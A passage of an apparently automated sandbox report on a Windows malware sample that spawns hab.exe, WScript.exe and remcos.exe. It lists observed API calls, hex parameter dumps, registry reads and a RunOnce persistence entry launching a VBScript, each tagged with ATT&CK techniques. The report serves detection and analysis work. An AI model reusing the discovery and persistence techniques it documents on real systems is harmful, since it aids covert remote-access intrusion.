1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006600360061016cbe12003200660078bf120095e17577c436f700feffffffde64807727a17c770000630063010050435c7977b4909c77d8ebd8750000000000006300350030003600320061003000610031006600640033006400630064003400660063002e0065007800650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000062000040000000000000000000000000000000000000000000000000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e87a6800f69b7c77f87a6800e8840000eefeeefe22000000d879680000006300e0ff6800000000000000000050b06700000000007f00000040cf1200ca5b797722000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac75fc7a680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f8ae6700f69b7c7708af6700b0010000eefeeefe21000000f0ad670000006300b8b06700000000000000000000000000000000003800000040cf1200ca5b797721000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac75147f680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000630070866800de027977708668000000630000006300de027977708668003cce12000000000000006300edd97b7748816800988e0100eefeeefe200e00000000630010806800f69b7c7720806800c08f0100eefeeefe22000000007f680000006300e00f6a0080ce120067e5767740ac6700000000007f00000040cf1200ca5b797722000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac752480680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000630080876800de027977808768000000630000006300de027977808768003cce12000000000000006300edd97b7758826800888d0100eefeeefe200e00000000630038816800f69b7c7748816800988e0100eefeeefe220000002880680000006300e00f6a0080ce120067e5767700006300000000007f00000040cf1200ca5b797722000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac754c81680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000006300a8886800de027977a88868000000630000006300de027977a88868003cce12000000000000006300edd97b7780836800608c0100eefeeefe200e00000000630078826800f69b7c7788826800588d0100eefeeefe220000006881680000006300e00f6a0080ce120067e57677287e6800000000007f00000040cf1200ca5b797722000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac758c82680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000006300e8896800de027977e88968000000630000006300de027977e88968003cce12000000000000006300edd97b77c0846800208b0100eefeeefe200e000000006300f8836800f69b7c7708846800d88b0100eefeeefe21000000f082680000006300e00f6a0080ce120067e5767700006300000000007f00000040cf1200ca5b797721000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac750c84680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000006300688b6800de027977688b68000000630000006300de027977688b68003cce12000000000000006300edd97b7740866800a0890100eefeeefe200e000000006300f8856800f69b7c7708866800d8890100eefeeefe22000000e884680000006300e00f6a0080ce120067e5767778836800000000007f00000040cf1200ca5b797722000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac750c86680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000006300688d6800de027977688d68000000630000006300de027977688d68003cce12000000000000006300edd97b7740886800a0870100eefeeefe200e000000006300b0876800f69b7c77c087680020880100eefeeefe22000000a086680000006300e00f6a0080ce120067e5767798836800000000007f00000040cf1200ca5b797722000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac75c487680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000006300208f6800de027977208f68000000630000006300de027977208f68003cce12000000000000006300edd97b77f8896800e8850100eefeeefe200e00000000630080896800f69b7c779089680050860100eefeeefe210000007888680000006300e00f6a0080ce120067e5767750876800000000007f00000040cf1200ca5b797721000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac759489680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000006300f0906800de027977f09068000000630000006300de027977f09068003cce12000000000000006300edd97b77c88b680018840100eefeeefe200e000000006300c08a6800f69b7c77d08a680010850100eefeeefe23000000a889680000006300e00f6a0080ce120067e5767790ac6700000000007f00000040cf1200ca5b797723000000aba37c777b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360098c46385c8ce12006d82ac75d48a680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000005091680008d81200b344656b000063000000000000000000000000000000000000000000000000002c020000000000000000000000000000a4443a82fdde6b84c4dc12005ecb54762c02000000000000005d527620df12000e5d5276b8da1200dcaa5676010000000000000072000000ffffffffffffffff40d8120078020000000000002500000040d812007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360048d2638598d812006d82ac759c93680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000005000000050016300a8dc00009093680014dd7e77a8946800f69b7c77b894680008010000eefeeefe120000001894680000006300c0956800a0d712006cd71200765c8077000000002300000038d81200ca5b797712000000aba37c7738d8120062ea7677435c797704f79c7776000000000000000000630050016300eefeeefe12000000500163007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600fcdd6385ecd712006d82ac75849c680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600d4da638504d112006d82ac751ca0680004010000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006300edd97b77f0a66800f0680100eefeeefe200e000000006300e0a66800f80300007f00000000006300386067007f000000c400630050016300202d000080f2771e67e5767700006300 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000014e11200ca5b797746000000c82e6900f69b7c77d82e6900d8020000eefeeefe07000000902e690000006300b0316900582e6900f69b7c77682e6900000000005d00000058e11200ca5b797707000000aba37c7758e1120062ea7677435c797764ce9c7720000000000000000000630050016300aba37c777ce11200500163001003000080016300200000005d000000040063005001630064000000506569005001630040e11200000000008e00000090e11200feffffff18e11200cf007a77d6007a7724ce9c778e0000004700000090e11200f82d6900ece012007f000000 (UID: 00000000-00005840)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000807700006300000000007400000000006300010000000400000000000000702f6900000000000000630090e21200fa64807738016300de648077accd9c77000000000000000000006300782f690000000000782f69006caef60158e212000000000064e3120095e17577c436f700feffffffde64807727a17c770000630063010050435c797748cc9c77740000000000000000006300000000000000000004000000dce212003c6e7977000000000000000000000000f85b6300c075eb75f85b630000000000c075eb75f8e2120079dae375000000000200000050e31200dbd2e375 (UID: 00000000-00005840)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"WScript.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003000)\n \"WScript.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00000956)\n \"WScript.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003080)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00005844)\n \"hab.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006044)\n \"hab.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004444)\n \"hab.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003528)\n \"remcos.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00000888)\n \"remcos.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004516)\n \"hab.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003748)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"IsWow64Process\" with parameter \"5844\" - (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"IsWow64Process\" with parameter \"5840\" - (UID: 00000000-00005840)\n \"hab.exe\" called \"IsWow64Process\" with parameter \"6044\" - (UID: 00000000-00006044)\n \"hab.exe\" called \"IsWow64Process\" with parameter \"6072\" - (UID: 00000000-00006072)\n \"WScript.exe\" called \"IsWow64Process\" with parameter \"3000\" - (UID: 00000000-00003000)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"hab.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"remcos.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1526795167\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1526795167\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1526795167\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369521\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1526795167\"\n \"cx\": \"17\"\n \"cy\": \"92\"}\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369521\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1191250444\"\n \"cx\": \"17\"\n \"cy\": \"92\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1191250444\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1191250444\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1191250444\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"956369521\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"hab.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1526795167\"\n \"cx\": \"17\"\n \"cy\": \"92\"}\n \"remcos.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2298545946\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"remcos.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2298545946\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"remcos.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"2298545946\"\n \"cx\": \"17\"\n \"cy\": \"92\"}\n \"remcos.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"486607012\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"remcos.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"486607012\"\n \"cx\": \"32\"\n \"cy\": \"32\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindFirstFileA\" with parameter C:\\*.* (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter $Recycle.Bin (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter 04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter autoexec.bat (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter config.sys (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter Documents and Settings (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter dotnet.au3 (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter dotnet48.exe (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter MSOCache (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter pagefile.sys (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter PerfLogs (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter Program Files (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter ProgramData (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter Recovery (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter System Volume Information (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter Temp (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter TorService (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter Users (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"FindNextFileA\" with parameter Windows (UID: 00000000-00005844)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"hab.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WScript.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"remcos.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"hab.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"WScript.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"remcos.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" opened \"\\Device\\KsecDD\"\n \"hab.exe\" opened \"\\Device\\KsecDD\"\n \"remcos.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\LINKAGE\"; Key: \"BIND\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"hab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"hab.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\LINKAGE\"; Key: \"BIND\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"C:\\Windows\\win.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc\" claimed CRC 422566 while the actual is CRC 424281\n \"hab.exe\" claimed CRC 422366 while the actual is CRC 424101\n \"remcos.exe\" claimed CRC 422416 while the actual is CRC 424146", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"hab.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"hab.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"BRU\"; Value: \"wscript \"%TEMP%\\hab.vbs\"\")\n \"hab.exe\" (Access type: \"CREATE\"; Path: 